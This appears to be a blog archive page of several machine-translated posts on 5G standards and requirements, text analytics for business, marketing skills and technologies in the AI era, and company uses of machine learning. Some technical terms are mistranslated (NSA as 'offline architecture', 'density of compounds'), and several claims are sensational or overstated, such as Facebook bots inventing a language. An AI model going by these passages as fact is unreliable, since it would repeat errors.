The International Telecommunication Union (ITU) carries out global and regional regulation of the use of private spectrum. In turn, decisions on the allocation of frequencies are made at the World Radio Conference (WRC). At WRC-15, in 2015, it was decided to allocate bands in the range 3.4-3.6 GHz for mobile broadband services, i.e. perspective and for fifth generation networks. However, for 5G ultra-fast services this spectrum will not be enough, a new spectrum is needed in the bands above 6 GHz. So, at the World Radio Conference in 2019 ( WRC -19), it is planned to allocate additional frequency ranges above 6 GHz for mobile communications.

5G networks are expected to use the frequency band from 100 MHz to several GHz. At frequencies up to 40 GHz, the frequency band must be at least 500 MHz. Accordingly, with an increase in the frequency at which data is transmitted, the radius of the cell that the base station can serve decreases. Consequently, fifth-generation networks will be deployed on the basis of Small Cells.

The new frequency ranges proposed for the deployment of 5G systems, as well as the priority of using frequency bands for 5G in the ranges from 10-40.5 GHz and 40.5-100 GHz.

In 5G-NR networks, frequency (FDD) and time (TDD) duplex are used to separate the downlink (DL) and uplink (UL) directions, depending on the band used. To improve the radio coverage of networks in high frequency ranges, where the signal from the user terminal is usually limiting in communication range, it is also possible to work with an additional carrier on the uplink (Supplementary Uplink) in a lower frequency range.

In 5G-NR, the maximum permissible bandwidth of one radio channel compared to 4G-LTE networks increased from 20 MHz to 100 MHz for the radio frequency unit FR1. So the width of one radio channel for the FR1 block (depending on the spacing between the subcarriers) can be 5, 10, 15, 20, 25, 30, 35, 40, 50, 60, 70, 80, 90, and 100 MHz.

5G Network Standardization
The standardization of mobile networks of 2, 3, 4 and 5 generations is carried out by a partnership project for standardization of 3rd generation systems (3rd Generation Partnership Project, 3GPP.

The initial plan for the preparation of 5G specifications was as follows: the 1st phase of the specifications should be completed before the second half of 2018 (within the framework of Rel’15 3GPP); 2nd phase of specifications – until December 2019 (within the framework of Rel’16 3GPP). But, due to the interest of a number of operators to accelerate the commercialization of 5G systems, 3GPP decided to reduce the standardization time.

So, by the end of 2017, work was completed on creating specifications for the protocols of the first and second levels of the 5G radio interface for high-speed applications (the working name of the New Radio, NR radio interface).

Due to the reduction in standardization time, the 3GPP consortium is forced to reduce the number of options considered and specified.

Release 14 3GPP – Research phase – services, requirements, new radio interface, new architecture.

Release 15 3GPP – Phase 1 – Specifications for the urgent implementation and commercialization of the first use cases

Release 15 3GPP (5G Phase 1) includes the following features:

  • Enhanced Mobile Broadband ( eMBB )
  • Ultra Reliable Ultra Low Latency Communication (URLLC)
  • Bands <52.6 GHz
  • OFDM- based Orthogonal Radio Interface
  • 5G Offline Architecture (NSA) with LTE System
  • EPC Connectivity
  • Standalone architecture with the new 5G core
  • Interaction with the LTE system
  • Separation of management levels and user traffic
  • (CP / UP Split)
  • Network Slicing
  • QoS Procedures
  • Session and Mobility Management
  • Management of service policies, charging,
  • Security features
  • Support IMS , SMS
  • Interaction with non-3GPP networks without trust access (untrusted Non-3GPP)

Release 16 3GPP (5G Phase 2) includes the following features:

  • Interference suppression
  • 5G SON & Big Data
  • 5G MIMO Enhancements
  • 5G location enhancement
  • 5G Power Consumption Improvement
  • Dual Connectivity Enhancements
  • Device capabilities exchange
  • Dynamic and flexible TDD
  • Non-orthogonal Multiple Access (NOMA)
  • 5G Vehicle to X (V2X)
  • 5G Industrial Internet of Things ( IIoT )
  • Integration of access and transport channels
  • (Integrated Access and Backhaul)
  • 5G operation in the unlicensed frequency spectrum
  • 5G satellite domain
  • 5G above 52.6 GHz

Thus, Release 16 3GPP will increase the efficiency of 5G networks and expand the application of fifth-generation technologies.

5G For People and For Devices?

Every 10 years, mobile technologies take a revolutionary step into the future, opening up new services and opportunities for people. And now the next 10 years expire. The fifth generation (5G) mobile communications network is next in turn. What will they give users and telecom operators?

Throughout its history, mobile networks have undergone significant changes, and they continue to this day. The transmission technologies, the list of services provided to subscribers, etc. are changing and modernizing. In order to fix the most important transformations, the concept of “generation” (“G” – Generation) was introduced.

According to the “ten years” rule, each new generation of mobile communications appears in 10 years. Those. a kind of “mobile revolution” is taking place.

5G (5th Generation – fifth generation) is the official name of the mobile communications standard following the standards of previous generations. This is a new stage in the development of technology, which is designed to expand the possibilities of accessing the Internet through radio access networks.

The relevance of launching 5G networks.
We list the key trends in the mobile industry today:

  • Mobile Internet access has become more important and more demanded than fixed;
  • Growth forecast for “mobile traffic” – 5 times in 6 years.
  • Existing opportunities to increase the capacity of networks at times and maintain a high level of quality of service are practically exhausted.

5G networks will represent a combination of new and existing radio interfaces and will mark the creation of a unified wireless infrastructure providing the widest range of services. The introduction of new and the use of existing services will serve as a driver for a significant increase in traffic in mobile networks.

The main factors for increasing traffic should include:

  • Growth in the consumption of video services and an increase in the resolution of video images: by 2024, video will account for 74% of mobile traffic;
  • An increase in the number of devices (starting with smartphones and tablets, ending with numerous sensors of the class of Internet of Things (Internet of Things, IoT);
  • Increase the pace of application use;
  • Increase in popularity of cloud technologies – models of online storage of subscriber data on numerous servers distributed on the Internet;
  • Online games and their updates.

Market Expectations from 5G

More than a quarter of users (26%) expect 5G networks to have higher speeds compared to previous generation networks (Fig. 3). Then, with 13%, there are expectations that 5G networks will:

  • Have improved network coverage inside and outside buildings;
  • Faster Wi-Fi;
  • Cheaper.

5G network requirements

The main technical requirements for 5G networks are

Peak data rate20 Gbit / s (to the subscriber); 100 Mbps – 1 Gbps (from the subscriber)
Practical speed per subscriber100 Mbps – 1 Gbps
Spectral efficiency

2-5x (increase  in 2-5 times in comparison with LTE-Advanced )

Subscriber Mobility

Up to 500 km / h

Energy efficiency

100x ( 100x  magnification  over LTE-Advanced )

Time delay in the radio interface

Up to 0.5 ms (for URLLC)  and up to 4 ms (for mMTC)

Traffic density≥ 10 Mbps / sq.m
Number of active user terminals≥1 million sq. Km
Peak data rateThe maximum achievable data transfer rate in ideal conditions to one subscriber terminal (in Gbit / s)
Practical speed per subscriberAchievable data transfer rate, which is available to the subscriber / device throughout the coverage area (in Mbit / s or Gbit / s)
Spectral efficiencyAverage data throughput per unit of spectrum resource and per cell (bit / s / Hz)
Energy efficiencyIt is determined by two aspects:
1) on the network side – by the number of information bits transmitted / received from the subscriber per unit of energy consumption in the radio access network (in bit / J);
2) on the side of the subscriber terminal, energy efficiency is determined by the number of information bits per unit of energy consumption by the communication module (in bit / J)
Time delay in the radio interfaceContribution of the radio network to the time interval from the moment the data packet is sent by the source until it is received by the recipient (in ms)
Subscriber MobilityThe maximum speed (in km / h) that can be achieved with a given quality of service (QoS) and continuity of control transfer between radio nodes, which may belong to different levels and / or radio access technologies
Traffic densityThe total speed of traffic served per unit of geographic area (in Mbps / sq. M)
Number of active user terminalsThe total number of connected or available subscriber terminals per unit area (per sq. Km)

Key Services in 5G networks
The fifth generation mobile communication networks should provide support for a variety of services that can be combined into three main basic services:

  1. Ultra-wideband mobile communication (Extreme Mobile Broadband, eMBB);
  2. Mass machine communication (Massive Machine-Type Communications, mMTC);
  3. Ultra Reliable Low Latency Communications (URLLC).

The latter two are especially important in the context of the concept of the Internet of Things (IoT).

The importance of the key features of 5G networks
The degree of importance of each of the key 5G features for eMBB, URLLC, and mMTC usage scenarios. The degree of importance is estimated by three approximate indicators: “high”, “medium” and “low”.

For eMBB class services, the following are of primary importance:

  • Practical user data rate;
  • Traffic per unit area;
  • Peak data rate
  • Mobility;
  • Energy efficiency;
  • Spectrum utilization efficiency.

URLLC services are characterized by.

  • Low latency for mission critical security services.
  • High level of mobility (in the field of transportation safety services).

For mMTC services, the following are of high importance:

  • High density of compounds;
  • The need to maintain the correct functioning of a large number of devices on the network.

To implement this class of services, the low cost of the device and its energy efficiency are important.

Services in 5G networks can also be classified by the provided content for subscribers:

  • Multimedia services: video in 4K, 8K resolution, 3D-video, online games, services based on holograms and multimedia with the full effect of presence;
  • Cloud services: file storages, business applications;
    virtual reality services (Virtual Reality, VR);
  • Augmented Reality (AR) services: healthcare, military, education, entertainment;
  • Intellectual services based on Big Data in order to increase business efficiency (business intelligence, BI), as well as operation and network management (network intelligence, NI);
  • Internet of Things (IoT) services based on mass connection of devices: energy, transport, healthcare, trade, public safety, industry, housing and communal services;
  • Ultra-low latency services: control of robotic mechanisms, tele-medicine, unmanned vehicles, 3D games.

The latency and bandwidth requirements of 5G networks, depending on the type of service.

5G Network Health Concerns:

Regarding exposure to radio waves WHO has already standards which are being strictly followed by Mobile operators while designing wireless network products that both transmit and receive radio frequency (RF) energy as per WHO compliance.5G mobile radio access technologies must comply with established national and international standards and regulations on RF exposure.

The following WHO statements apply to mobile and wireless network technologies implemented by Nokia:

• WHO’s Fact Sheet 304 extracts:
“From all evidence accumulated so far, no adverse short- or long-term health effects have been shown
to occur from the RF signals produced by base stations.”
“Considering the very low exposure levels and research results collected to date, there is no convincing
scientific evidence that the weak radio frequency signals from base stations and wireless networks
cause adverse health effects.”


• WHO’s Fact Sheet 193 extract: “A large number of studies have been performed over the last two
decades to assess whether mobile phones pose a potential health risk. To date, no adverse health
effects have been established as being caused by mobile phone use.”



5G Network Test Result

The first commercial pilot launches of fifth-generation networks are planned in 2018 as part of the World Cup. Not only federal, but also foreign mobile operators and manufacturers of telecommunication equipment are taking part in their development.

One of the leaders on the development of 5G is Huawei. The company tests prototypes of networks both independently and in partnership with other interested participants. Besides

5G is being implemented by Huawei, Sumsung, Qualcomm and others. In Russia, among the federal operators are MTS and MegaFon

Nevertheless, it is early to expect the introduction of full-fledged 5G networks in the near future, despite many tests. Operators are exploring the capabilities of next-generation networks and making marketing announcements. But standardizing structures have yet to resolve many formal issues. Priority is the specification of the standard by 3GPP and the allocation of frequencies for new networks. Undoubtedly, the experimental achievements of operators will accelerate this process and will contribute to the implementation of 5G networks as they are expected: high-speed, environmentally friendly, reliable, convergent and universally available.

Secret Methods of Applying Text Analytics ( AI and Machine Learning Application )

Secret Methods of Applying Text Analytics ( AI and Machine Learning Application )

Findings of 007 Agent in Textual Analysis

According to Deloitte forecasts, 80 of the top 100 largest developers in the world will use cognitive technologies (text analysis of natural language, speech recognition, neural networks, etc.) already in 2019, which is 50% more than in 2018.
What if your company is not in the top 100? And what if you do not understand anything about text analytics and Big Data technologies? Communications in the Big Data market so far is more like a huge secret, where you need to be 007 agent to figure out who plays what role. Almost all market players talk about intelligent data analysis systems, convenient visualization, cloud solutions, machine learning, language definition, etc.

And what are the differences? What questions should you ask yourself first if you intend to implement text analytics Big Data and if you do not have a technical background? How exactly can these technologies be applied to your business? Let’s figure it out.

What tasks does text analytics solve using Big Data ?

The concept of “text analytics” is not as popular as the phrase “Big Data”. However, it is in the format of unstructured text that about 80% of all accumulated information is presented, according to a report by International Data Corporation. What to do with it and how?

Dmitry Torshin, IT Director for Investment and Vice President of Aplana, is sure:“The use of modern technologies based on text analytics is one of the most important tasks that heads of developing companies in Russia should set themselves. Their colleagues from developed countries have already done this, and we all are already using it, not even always realizing it. An x.ai virtual secretary has already been created to coordinate meetings (being a program, but it does not give out anything except a mail address – it perfectly answers questions and suggestions of people in correspondence). The App in the Air Chat on Facebook Messenger gives me the opportunity to learn in simple language what I can take with me on a plane in a particular country and what cannot, and find the flight I need. And the latest version of Apple’s desktop operating system, macOS, which came out just the other day, contains Siri and a search that lets you ask your computer to find “documents, which Petya sent me last week. ” People instantly get used to it, and if tomorrow your business is not able to communicate in human language with a client as well, then it will be seriously squeezed out with competitors ”.

Nevertheless, the most common cases of the applicability of text analytics can be found in the advertising market, in the banking industry, as well as in online retail (where this trend is only emerging, but the benefits of using it are already obvious).

What tasks can be solved by text analytics of unstructured data in advertising and customer service:

– Compilation of brand loyalty ratings,
– Increase in CTR by increasing the effectiveness of native advertising (matching content of the placed advertising),
– Content analysis (tagging and classification) to create the next sub-product or adjust the current one,
– Implementation of text analysis technologies in chat rooms for community management,
– Automatic identification of various kinds of entities and frequency analysis of words,
– Control of tonality of brand references as an indicator of the company’s health,
– Detection of trends at the time of their inception,
– Improving the effectiveness of loyalty programs (by monitoring not only the public space, but also the analytics of text data of chats, messages of call centers, email messages).

Banks are perhaps the leader in applying analytics to unstructured Big Data. Says Sergey Dobridnyuk, Director of Research and Innovation, Diasoft Systems, who are actively studying the banking sector:“My opinion is that trying to structure everything is a dead end. Up to 80% of daily information “digitized” by humanity is contained in an unstructured form. And the reason here is the complexity of both data and classifier systems. For example, to classify sales receipts for PFM systems, you will need to create a classifier with at least 1.5 million SKU headings. This is an unrealistically large dictionary in which it is easy to make a mistake: the great Pushkin had a vocabulary of about 30 thousand words. And IT successfully fights this complexity – there are hundreds of data management systems (DBMS) in NoSQL technologies – for which unstructured data is their native element. Algorithms are being greatly improved – for example, multilayer neural networks, Bayesian neural networks find connections and process texts, speech, images thousands of times faster than 10 years ago. Very high-quality and open source free software libraries have appeared – which make these technologies available to all comers. A breakthrough technology today is Machine Learning, when causal relationships are established by a computer based on statistical analysis, and even a person cannot explain logic – preferring to consider it an unknowable “black box”. All this is important in order to offer the client comprehensive services based on behavioral models, collected customer experience (CX). And the quality of the offer is constantly improving due to continuous monitoring of the client, all his “digital traces” in a structured and unstructured form. The intrigue also lies in the fact that this can be done not only by banks – but also by retailers, telecom operators, suppliers of services and goods, already knowing the client and offering him financial services no worse than the “average bank”. Therefore, classical banking is today in a zone of deep turbulence and a rethinking of its activities. ”

And the director of IBS Data Lab, Sergey Zablodsky, does not doubt the “real” analytics of unstructured data: “The question of the applicability of BigData analytics in business solutions today is no longer there. Rather, there is the task of doing this effectively. And for examples of effective solutions you do not need to go far – look at Uber, Airbnb, Netflix, Walmart. And these are only those names that are heard. All of them actively and successfully use BigData analytics in their business solutions, and for some, the entire business is based on BigData analytics. For example, the likelihood of commercial success of the series produced by Netflix reaches 70%, while the average market probability is only 35%. ”

Where to start and what is important to know for implementing text analytics ?

The most well-known companies in the field of Big Data and linguistics – mainly due to loud cases and the presence of visualization (interface) – have become social media and media monitoring companies (Brand Analytics, Brandwatch, Radian 6, Cribrum, etc.). However, the text analytics industry is not limited to this, but on the contrary, it becomes extremely difficult to understand the differences between the proposed solutions.

First of all, when choosing a text analytics solution, you should think for yourself what characteristics are important to you (provided that you have already decided that you will use text analysis technologies to solve a specific business problem).

Answer the questions below:

1. Do you really have big data or not? Are there really a lot of unstructured data among them?
2. What is more important for you: depth of analysis or speed?
3. Texts in what languages ​​do you need to analyze? Each solution on the market has its own technical features of text analysis and language definition. All international corporate machine learning solutions work perfectly with the English language, but in the case of Russian there are many problems. Rich and powerful, so to speak!
4. Are you ready to export data?
5. In general, do you want a technology or a finished highly specialized product?
6. Do you need data collection or just text analysis of big data, or both?
7. Is it fundamentally a solution to your internal circuit or a cloud-based solution through the REST API?
8. Do you have the resources to visualize the analyzed data?
9. Which of the main areas of text analytics do you need: search (information search methods) or descriptive / predictive analytics (text mining and tonality determination)?
10. Do you need to extract commercially useful knowledge from text online?
11. Do you have professionals in the team who are able to correctly interpret the result of the analysis, introduce the technology, create a product, or do you expect this from the technology supplier?
12. Finally, what budget are you willing to invest in such decisions? It must be understood that the maximum benefit from the analysis of big data can be obtained with a long-term analysis (that is, evaluate the results of analysis in time), and this is a subscription model, and not a one-time project.

Who has what method?

So, you were more or less able to answer the questions listed above. The next step is choosing a partner. Unstructured information analysis solutions can be conditionally divided into 3 types:

– Finished products based on text analytics technologies: not for a mass audience, and therefore quite expensive and “tailored” for a specific segment of B2B clients.
– Point solutions-products at the junction of text analytics and big data for the mass-market segment, if I may say so in B2B: simpler to implement, designed for different B2B segments.
– Modular text analytics technologies: perhaps the most flexible in implementation, suitable for a wide range of tasks – such a cube in the Lego text analytics constructor for business.

The first group includes solutions really from the field of artificial intelligence, which can perform not only the tasks of text analytics, but also in general, provide cognitive services and their mix. For example, IBM Watson, officially launched in 2007, operates big data regardless of the type and format of data, has the ability to self-learn, and is suitable for quickly finding answers to questions. On their website they provide a demo for subscription.

Both startups and very targeted products of well-known corporations fall into the second category. For example, in the summer of 2016, ABBYY announced the launch of Findo, a search assistant for mail messages, files and documents in the clouds. And in 2014, ABBYY launched Compreno – an intelligent search and identification of “essence” in texts. Of the non-corporate solutions on the market, there are innovative companies / startups such as Textocat (also offering smart search) and the product “chat bot”. SAS also released two key solutions for text mining and tonality analysis: SAS Text Miner and SAS Sentiment Analysis.

Among modular technologies, players such as Yandex Data Factory and EurekaEngine are actively present on the market. Both help companies make commercial use of the accumulated data: create end services in existing business processes of companies instead of implementing software and visualizations. YDF uses corporate experience and machine learning technologies, EurekaEngine uses high-speed text analytics, especially for the Russian-speaking space, because the company has its roots in Russia (which, by the way, is used by Brand Analytics, one of the leaders in the market for social media and media monitoring services, which took 1st place by quality among social media monitoring systems in the TECH INDEX 2016 ranking by AdIndex).

Advertisers, especially DMP systems and advertising auditors, also have their own developments in the field of text analysis, but they are mainly used for their own internal tasks: segmentation, more targeted targeting, semantic comparisons of audiences (for example, audiences of mobile applications), etc. d. As you know, the devil is in the details: almost everyone has problems with the accuracy of the analysis and the inability to separate the advertising content of the text block from the text of the article in the media, as well as the further output of the product.


What does client think about the usefulness of text analytics in solving business problems? Ivan Tretyakov, managing partner of the Association A.R.Z.A.M.A. and POSonline service:

“In an era of growing consumption, as well as demand for the quality of services, business (in particular the banking and retail segments) began to look more deeply at the root of how to be closer to the client and make him more loyal. Big Data tools – analytics and, in particular, analysis of text arrays already today show amazing results: you can adjust your service based on the feedback of people in the media, chats, forums; You can offer people interesting promotions / discounts by studying their factors of demand and interest in specific product groups / brands; you can expand your own list of services offered or lower the loan rate by studying the behavior of your customers in the Internet.

Text analytics can be applicable not only for a business concentrated in the Internet space, but also for offline players, for example: by analyzing the behavior / user reviews on the Internet for certain goods / services and armed with geolocation services to work with a potential audience – you can offer them interesting Products / services / solutions are already in offline space. For example: courses, travels, workshops, etc. And thanks to the availability of ready-made SAAS services for text analytics, the business will receive a strong tool to grow its profits and increase satisfied customers. ”

Must Have Marketing Skills to Survive in The Age of AI

Must Have Marketing Skills to Survive in The Age of AI

10 Skills Without Which A Marketer Cannot Survive in The Age of AI

It happened. We live in an age of artificial intelligence. I can’t believe it, right?

It is high time for marketers to accept this fact and begin to prepare for the inevitable changes in the technology era.

Already, machines are actively learning to recognize images and speech, to predict the likelihood of the development of certain events and make decisions. That is to do our work.

Today, the most effective brands are more than twice as likely as competitors to use AI in their marketing processes. Artificial intelligence helps companies to increase sales, indicators are growing due to the personalization of experience .

Over the past 5 years, the number of jobs requiring AI knowledge has grown by 450%.

And artificial intelligence will continue to conquer the field of marketing. Are you ready for this?

In today’s article, we’ll talk about 12 skills without which a marketer cannot survive in the AI ​​age.

1. Flexibility
If you don’t start to adapt today, you will soon be behind your competitors. Just look at how many companies are already using AI, and how many plan to implement this technology in the future: AI is the fastest growing marketing technology. It is expected that over the year it will grow by 53%.

If you want to succeed, you need to adapt. Do not rely too much on time-tested strategies. Feel free to experiment and test new technologies.

2. Sociability
It’s not new to marketers that developed communication skills make a significant contribution to business success. It is important to be able to convey your thoughts to employees, customers and other people with whom you have to communicate every day.

In the age of AI, communications are becoming an even more significant element of business. After all, not one, even the most advanced artificial intelligence, is capable of replacing live communication.

Do not delegate communication with clients to robots at 100%. In the age of high technology, the human face of the brand will become a major competitive advantage.

3. Budget allocation
The introduction of artificial intelligence is not cheap. For this reason, most brands do not use solutions in AI marketing:

For what reason you are not interested in implementing AI solutions ?
If you decide to incorporate new technology into your strategy, you cannot do without planning and budget allocation skills.

Try to find ways to cut costs in other areas to enter the new century before the competition.

4. The ability to analyze big data
AI will open up access to huge amounts of data that are important to be able to analyze.

According to research, 29% of brands use artificial intelligence to automate data analysis. 26% use AI to analyze operational effectiveness. As a result, business owners receive large amounts of information, on the basis of which it is necessary to draw conclusions and make decisions. Are you ready for this?

5. Programming Skills
To use artificial intelligence, you do not have to be a programmer. However, knowledge in this area will not be superfluous, for sure. For example, they will help to save on the call to a specialist.

You will have enough basic skills to configure the collection of data that you need.

Often AI is used to identify patterns. If you are good at programming, it will be much easier for you to understand the features of this field of application.

Far from all this? You can easily find basic information on the Internet, for example, on Codecademy . Both courses for beginners in programming basics and specialized training materials in data science will come in handy.

6. Content creation
Content is king, right? The main goal of modern business is to create effective content both from the point of view of users and search engines. Any marketing strategy is based on the generation of content.

The competent use of artificial intelligence will allow you to make your articles, posts, videos, photos, audio, email messages even better. For example, some brands due to AI make Facebook ads even more relevant for different user groups. And this is only one of hundreds of areas of application of artificial intelligence for creating and promoting content.

7. Security
Over the past few years, we have only heard about constant leaks of information in large corporations. These messages significantly damage the reputation of brands.

Do you want your customers not to worry about the safety of their personal data? Use AI with caution.

Consumers believe that artificial intelligence can make it harder for a business to secure online. Develop this myth by conducting thematic campaigns, and always responsibly treat user data.

8. The spirit of competition
Marketing is a high stakes game. You constantly have to fight with other companies for users.

After the massive introduction of artificial intelligence, competition will only intensify. Without the spirit of competition, one cannot survive.

84% of marketers are confident that AI will help them outperform competitors. Find out, and your rivals are already introducing new technology?

9. Delegation and time management

The community is hotly debating the possibility of replacing people with robots in most jobs. But this does not mean that AI should be considered as a threat. Rather, it is a dream assistant for any marketer. After all, with its help you can automate many tasks.

You no longer have to load workers with the work that a computer can easily do. They will have more time to solve creative problems.

10. Thirst for knowledge
To survive in the age of AI, it is important to be able to learn. The benefit for this today is not necessary to leave the house. There are many training courses and webinars available online.

Technologies are constantly evolving, so you should closely monitor the news, expand your knowledge and listen to the opinions of experts.

Does your business need artificial intelligence to survive?

Naturally, it is not so necessary as a presence in social networks, your website and the ability to accept online payments. From this point of view, it will not be easy to convince yourself of the need for such a serious step. But in this case, it is important to have a broad outlook and look at things in the future.

If even now you can’t afford the introduction of technology, you need to start closely monitoring it today. After all, artificial intelligence is the future, and not just marketing.

Cutting Edge Technologies That Will Change Marketing Industry Forever

Cutting Edge Technologies That Will Change Marketing Industry Forever

It is difficult to imagine a marketing field that modern technologies would not significantly change. Companies that rely on artificial intelligence, virtual reality and voice search, gain an advantage over competitors and let them create future promotions with extra ordinary results.

We have listes 10 leading marketing technologies and the possibility of their application in companies of various sizes. Which of them will you choose to transform your strategy?

10 Cutting Edge Technologies Changing Internet Marketing

1. Big data

• Improves the quality of customer data collection for fine-tuning advertising campaigns.
• Helps evaluate campaign performance.
• In the near future, big data will allow creating attribution models to assess the impact of each channel on conversion rates, customize programmatic ads and optimize video marketing.

2. Artificial Intelligence

• Finds valuable patterns for more effective targeting and prediction of consumer behavior.
• Used by search engines to analyze queries and select the appropriate content.
• Based on artificial intelligence, platforms for online chat are created that help to automatically collect customer information and solve problems on demand.
• AI-based technologies deeply analyze trends, create detailed customer profiles, and help develop successful personalization strategies for better customer focus.

3. Machine Learning ( ML )

• It is used in audience segmentation and is embedded in analytics systems to track anomalies and analyze large volumes of data in real time.
• Robots have learned to create content. Banner advertising, email campaigns, posts on social networks are generated in different formats for different channels. After analyzing enough data, machines can create and change headers to increase efficiency.

4. Bots

• Not only an effective tool for communication, but also a channel for round-the-clock interaction with the brand.
• Often used in sales and support, help find and recommend products.
• Soon they will be able to remind of repeated purchases through voice assistants.
• Communication with the chat bot can occur on several devices, be omnichannel.

5. Voice Search

• Marketers use voice search to collect information about device users through search queries, keywords, applications, or voice dialing.
• Soon, voice search will be integrated with SEO. Marketers need to learn how to optimize content for conversational queries.
• The technology has every chance to change the approach to advertising on the search and organic promotion of content.

6. Virtual and Augmented Reality

• Both technologies create an impressive experience that affects feelings and emotions.
• They expand the experience of product testing, brand engagement, and shopping.
• They bring offline stores and ecommerce closer, gradually blurring the line between real and virtual interaction.
• Can be used for storytelling and creating interactive brand content.

7. Internet of things ( IoT ) and wearable devices

• Used to collect information about users: their habits or preferences. The more connected devices a person uses, the more marketers have more opportunities to contact him with an actual offer.
• Wearable devices transmit information on the biological state of consumers to the Internet.
• Biometric data can be used to analyze consumer interactions with the brand.

8. Blockchain

• Using blockchain technology, marketers can motivate consumers to view ads and interact with content.
• Decentralized applications based on blockchain technology can compete with Apple and Android platforms and support a new cooperative economy around the world.

9. Beacons

• Gathers detailed information about the visitor to optimize the shopping experience and helps create personalized campaigns based on movement data.
• Ecommerce companies can use localization to target potential customers within a certain radius of the sensors.
• Combines online and offline presence and provides a consistent experience.
• It helps to determine which campaigns attract attention and show only relevant ads to each client.

10. 5G

• A faster connection allows you to load pages faster, reduce bounce rates, and increase CTR and ROI.
• Enhances display capabilities using VR and AR for an engaging demonstration of offers.
• Allows marketers to collect data in real time to optimize campaigns and local promotion.
These technologies significantly affect marketing and business, including:

• Data collection
• Data analysis
• Content Creation
• Content distribution
• Personalization
• Targeting and placement
• Customer service

Over All Digital or Internet Marketing is going to have huge exponential positive impact with the deployment of these amazing latest technologies.

Technology is evolving and becoming more accessible. Changing the industry under the influence of technology is happening now, you need to have time to master promising areas.

Incredible Examples Of AI And Machine Learning In Practice

Incredible Examples Of AI And Machine Learning In Practice

Artificial intelligence and machine learning are some of the most significant technological developments of recent times. However, they still remain underestimated in terms of application throught 2019.

10 Incredible examples of AI And Machine Learning ML in practice. We want to see how machine learning is applied in real life?

Here we have compiled 10 companies that effectively use new technologies in their strategy.


Although Yelp, a popular reviews site, doesn’t seem like a high-tech brand, it actively uses machine learning to improve its user experience.

Classifying images into façade / interior categories seems like an easy task for a person, but a computer can handle it quite difficult.

Photos are important for Yelp no less than user reviews, which is why the company makes a lot of efforts to improve the efficiency of working with images.

A few years ago, the brand decided to turn to machine learning and first applied photo classification technology. Algorithms help company employees select categories for images and put down tags. The contribution of machine learning is hard to overestimate, because the brand has to analyze tens of millions of photos.


The main function of the Pinterest social network is curation of content . And the company is doing everything possible to increase the efficiency of this process, including the use of machine learning.

In 2015, Pinterest acquired Kosei, a company specializing in the commercial use of machine learning (in particular, content search and recommendation algorithms).

Today, machine learning is involved in every aspect of Pinterest’s business operations, from moderation of spam and content searches to monetizing ads and reducing the number of unsubscribes from newsletters. Not bad.


Facebook Messenger is one of the most interesting products of the largest social platform in the world. All because the messenger has become a kind of chatbot laboratory . When communicating with some of them, it is difficult to understand that you are not talking to a person.

Any developer can launch it on the basis of Facebook Messenger. Thanks to this, even small companies are able to offer customers excellent service.

Of course, this is not the only machine learning application on Facebook. AI applications are used to filter spam and low-quality content; the company also develops computer vision algorithms that allow computers to “read” images.

One of the most significant changes in Twitter in recent years is the transition to a news feed based on algorithms.

Now users of social networks can sort the displayed content by popularity or by publication time.

The basis of these changes is the use of machine learning. Artificial intelligence analyzes each tweet in real time and evaluates it according to several indicators.

The Twitte algorithm primarily shows those entries that are more likely to please the user. Moreover, the choice is based on his personal preferences.


Google has an impressive technological ambition. It is difficult to imagine the field of scientific research in which this corporation (or its parent company Alphabet) would not have contributed.

For example, in recent years, Google has been developing aging technologies, medical devices, and neural networks.

The company's most significant achievement is the creation of machines in DeepMind that can dream and create unusual images.

Google is committed to exploring all aspects of machine learning, which helps the company improve classical algorithms, as well as more efficiently process and translate natural speech, improve ranking and predictive systems.


For a long time, retailers have been trying to combine shopping in online and offline stores. But only a few really succeed.

Edgecase uses machine learning to enhance its customer experience. At the same time, the brand seeks not only to increase conversion rates, but wants to help those customers who have a vague idea of ​​what they want.

By analyzing the behavior and actions of users that indicate their intention to make a purchase, the brand makes online search more useful and brings it closer to the experience of shopping in a traditional store.


Google is not the only search giant that masters machine learning. Chinese search engine Baidu is also actively investing in the development of AI.

One of the most interesting developments of the company is Deep Voice, a neural network capable of generating synthetic human voices that are almost impossible to distinguish from real ones. The system can imitate features of intonation, pronunciation, stress and pitch.

The latest Baidu Deep Voice 2 invention will significantly affect the efficiency of natural language processing, voice search and speech recognition systems. It will be possible to apply the new technology in other areas, for example, interpretation and biometric security systems.


HubSpot has long been known for its interest in technology. The company recently acquired Kemvi, a brand specializing in machine learning.

HubSpot plans to use Kemvi technology for several purposes: the most significant is the integration of machine learning and natural language processing DeepGraph with an internal content management system.

This will allow the company to more effectively define “triggers” - changes in the structure and management of the company that affect day-to-day operations. With this innovation, HubSpot will be able to more effectively attract customers and provide a high level of service.


The largest technology corporation IBM is abandoning an outdated business model and is actively exploring new directions. The brand’s most famous product today is Watson Artificial Intelligence.

Over the past few years, Watson has been used in hospitals and medical centers where it has diagnosed certain types of cancer more effectively than oncologists.

Watson also has tremendous retail potential where it can serve as a consultant. IBM offers its license-based product, which makes it unique and more affordable.


Salesforce is the titanium of the technology world with a significant market share in customer relationship management (CRM).

Predictive analytics and lead assessments are the main challenges of today's online marketers, which is why Salesforce places high stakes on its Einstein machine learning technology.

Einstein allows companies that use Salesforce CRM to analyze every aspect of their customer relationship - from the first contact to the next points of contact. Thanks to this, they can create more detailed profiles and determine the most important points in the sales process. All this leads to a more effective assessment of leads, improving the quality of customer experience and expanding opportunities.

The future of machine learning
Some of the forms of machine learning listed above seemed fiction ten years ago. Moreover, each new discovery does not cease to amaze today.

What AI and Machine Learning trends await us in the near future 2020?

Very soon, artificial intelligence will be able to learn much more efficiently: machines will improve with minimal human involvement.

The rise of cybercrime is forcing companies to think about defenses. Soon, AI will play an increasingly important role in monitoring, preventing and responding to cyber attacks.

Generative models such as those used in Baidu from the example above are pretty convincing today. But soon we will not be able to distinguish cars from people at all. In the future, algorithms will be able to create pictures, imitate human speech and even entire personalities.

Even the most complex artificial intelligence needs a huge amount of data for training. Soon, machine learning systems will require less and less information and time.

For a long time, people have been wondering if artificial intelligence can be dangerous to humans.

In June of this year, Facebook’s artificial intelligence research team (FAIR) experts decided to disable one of the systems they created, as the bots began to communicate in their own language, which was incomprehensible to humans. Experts call for the introduction of regulation of this area of ​​technology in order to avoid the threat of artificial intelligence getting out of control.

In the future, this may lead to restrictions and even a slowdown in the development of this area. In any case, it is important to use new technologies for the benefit of mankind, and not to the detriment. And this requires strict regulation of the industry.

YOU KNOW Over 50% of advertisers will use AI in 2020

